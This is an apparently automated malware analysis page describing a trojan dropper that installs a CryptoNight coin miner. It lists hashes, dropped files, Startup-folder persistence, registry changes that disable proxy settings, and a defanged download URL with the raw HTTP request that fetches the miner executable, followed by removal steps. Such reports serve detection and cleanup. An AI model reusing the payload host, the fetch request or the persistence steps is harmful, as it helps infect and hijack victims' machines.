Gen.Variant.Zusy.227166_b033187490

by malwarelabrobot on August 21st, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Zusy.227166 (B) (Emsisoft), Gen:Variant.Zusy.227166 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: b033187490944dff55616eb5972ad374
SHA1: 250202e0d9a456ac4187df966e397303b97d5cec
SHA256: 00375c93b441c9c7e827c71712dfce3cb06880f5fe54ad8ef24de3959d5f97bc
SSDeep: 768:2IsZEZ2yaMtSl//8CChlie93EodO7zErpNaz2EzxRG524CqR9snbcuyD7UxpO:2xZ4Boh8ll5/dUasRGtCDnouy8jO
Size: 36352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2017-01-19 10:33:43
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3804
csrs.exe:4076
WScript.exe:2272
wscript.exe:3820

The Trojan injects its code into the following process(es):

csrs.exe:4072

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\7417.vbs (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\7417.vbs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\7417.tmp (0 bytes)

The process csrs.exe:4076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk (796 bytes)
C:\ProgramData\Windows\csrs.exe (4099 bytes)
C:\ProgramData\Windows\svchost.vbs (1 bytes)

The Trojan deletes the following file(s):

C:\ProgramData\Windows\__tmp_rar_sfx_access_check_1485628 (0 bytes)

The process WScript.exe:2272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\Windows\csrs.exe (48 bytes)

The process wscript.exe:3820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\csrs.exe (359033 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\csrs[1].exe (89274 bytes)

Registry activity

The process %original file name%.exe:3804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process csrs.exe:4076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

The process WScript.exe:2272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

The process wscript.exe:3820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5	File path
e3427d9f439aebefa3d9c299e2a94af3	c:\ProgramData\Windows\csrs.exe
e3427d9f439aebefa3d9c299e2a94af3	c:\Users\All Users\Windows\csrs.exe
129e0162504a3f50eef881a0cdb06b00	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\csrs[1].exe
129e0162504a3f50eef881a0cdb06b00	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\csrs.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	57344	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	61440	36864	33792	5.49652	af4d42343a79a7f0c5c3301b680592cb
.rsrc	98304	4096	2048	2.92082	d0e551bd3bd1fbb9e537eddf46a8a0ef

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://maddog.pro/miners/3/csrs.exe	185.26.122.63
teredo.ipv6.microsoft.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /miners/3/csrs.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: maddog.pro

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.10.2

Date: Sun, 20 Aug 2017 02:52:57 GMT

Content-Type: application/x-msdownload

Content-Length: 1662734

Connection: keep-alive

Last-Modified: Tue, 11 Jul 2017 11:45:08 GMT

ETag: "3181a2a-195f0e-554093b3279b8"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........?...QN..QN
..QN...N..QN...N-.QN...N..QN..PNN.QN...N..QN...N..QN...N..QN...N..QNRi
ch..QN........PE..L....ALV..........................................@.
.........................p..........................................3.
..T........ ..xE......................................................
........@............................................text...T.........
.................. ..`.rdata...P.......R..................@..@.data...
(...........................@....rsrc...xE... ...F..................@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................B..>...QV...u....8..
.E......o.....l-...E...`......"...E...Q..........E...8N...M...N@.,N...
M.^d........3..|$..rJ.L$..9RuA.|$..r:.y.au4.y.ru..y.!u(.y..u".y..u..I.
..u.j......u.j......u.j.X.....j...L.....H....P..U....\....t..E...@....
E...P....u..E.....E...E.]....D$.V...F..N.;N.v_.F.SUW..5C...t.;.v.Ph .B
.U..R.........R...F.......D. .N...;.w...S.6.......YY..u....dR...>_]
.^.[^...V...L$......P..F..V...^.........j..p..p..R...D$.V...F..N.;N.v`
.F.SUW..5C...t.;.v.Ph .B.U.PR.........Q...F..~.......D. ;.w.....?P

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

WScript.exe_2272:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

msvcrt.dll

OLEAUT32.dll

ole32.dll

VERSION.dll

Hw2.Hw3;Jw_

advapi32.dll

wscript.exe

kernel32.dll

%s%s.DLL

wintrust.dll

%d.%d

Invalid parameter passed to C runtime function.

SOFTWARE\Classes\%s\%s

0x%8X

CreateURLMonikerEx

urlmon.dll

@@8X%u

RegCreateKeyA

RegCloseKey

RegOpenKeyA

RegDeleteKeyA

RegCreateKeyExW

RegCreateKeyExA

RegOpenKeyExW

ReportEventW

RegEnumKeyExA

RegOpenKeyExA

GetProcessHeap

GetCPInfo

MsgWaitForMultipleObjects

EnumThreadWindows

wscript.pdb

stdole2.tlbWWW

.ObjectWW

KeyW

WindowsFolderWWW4

%CopyFolderWWL

Windows Script Host (Ver 5.6)W)

Windows Script Host Application InterfaceW%

Windows Script Host Object

ebstrCmdLineW

1.191>1[1

: :$:(:,:0:4:8:<:

Software\Microsoft\Windows Script Host\Settings

Windows Script Host

WScript.CreateObject

WSHRemote.Execute

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

Windows Based Script Host

5.8.7600.16385

Windows Script Host

(Windows Script Host (debugging disabled)

Windows Script Host Error

Windows Script Host Input Error

This Unicode version of Windows Script Host will only execute under Windows NT.

Please use the ANSI version of Windows Script Host."

WScript execution time was exceeded on script "%1!ls!".

Script execution was terminated.1Could not locate automation class named "%1!ls!".

Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).

Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled.SAttempt to execute Windows Script Host remotely while remote execution is disabled.

Missing job name.*Unicode is not supported on this platform.

<The Windows Script Host settings have been reset to default.

Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.

Win32 Error 0x%X

Windows Script Host(Windows Script Host (debugging disabled)

Usage: WScript scriptname.extension [option...] [arguments...]

Use engine for executing script

Changes the default script host to CScript.exe

Changes the default script host to WScript.exe (default)

Prevent logo display: No banner will be shown at execution time

#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.

%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

csrs.exe_4072:

.text

`.rdata

@.data

.vmp0

.vmp1

.reloc

@.rsrc

X?.Eoe

lKi.mA

(.VI~e

H.mBz]6<

.ILmx

o:\L|

N.vDc

.rP 4&P

D%U4y

%f?]5

11D1

434~4&585

3 3$3(3,30343

7|7r7

7|7R7a7

9 9$9(9,90949~9

<"=1=9=?=

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

1 1$1(1,1014181<1

; ;$;(;,;

8(8,80848

0S091K1h1

0 0$0(0,0

W-.GE;

w.Su7

%c"c5

@?>=<;:9

87654321

0/.-, *)

('&%$#"!

}|Xd.rd

4f.lU

S0.LY

!CTa

h%S)Jy

=f.lz?

6*Á

F.SZT}

.zmH`

.Xm0_

d^%c.

I.DJw

?a.PuC"

,K.Bys

Z.Egh

.ITgt=

%Uv@u

eo.qe

,.UW434

%Dxwq

2:.xCO

Y3.LZ

-.LR$

\Sý

R.wf4

{v.xd

.XF8J

.yKgc

3Âm

BsQl|

-FLt}E

@.zSV

b8A%c

}.qTa

i:\O0N 2lw

jÄEm

t%Un{

qL%Ct

[%uo$

.pjXc%

<:86420.

WS2_32.dll

EnumChildWindows

CRt*u

.Wi|W

%cZy y

?>=<;:98

76543210

/.-, *)(

\.DDp(T

2bP%X

p.uDxi

USER32.dll

ADVAPI32.dll

F%u~M<

KERNEL32.dll

user32.dll

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

conhost.exe_140:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:3804
csrs.exe:4076
WScript.exe:2272
wscript.exe:3820
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\7417.vbs (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk (796 bytes)
C:\ProgramData\Windows\csrs.exe (4099 bytes)
C:\ProgramData\Windows\svchost.vbs (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7407.tmp\csrs.exe (359033 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\csrs[1].exe (89274 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.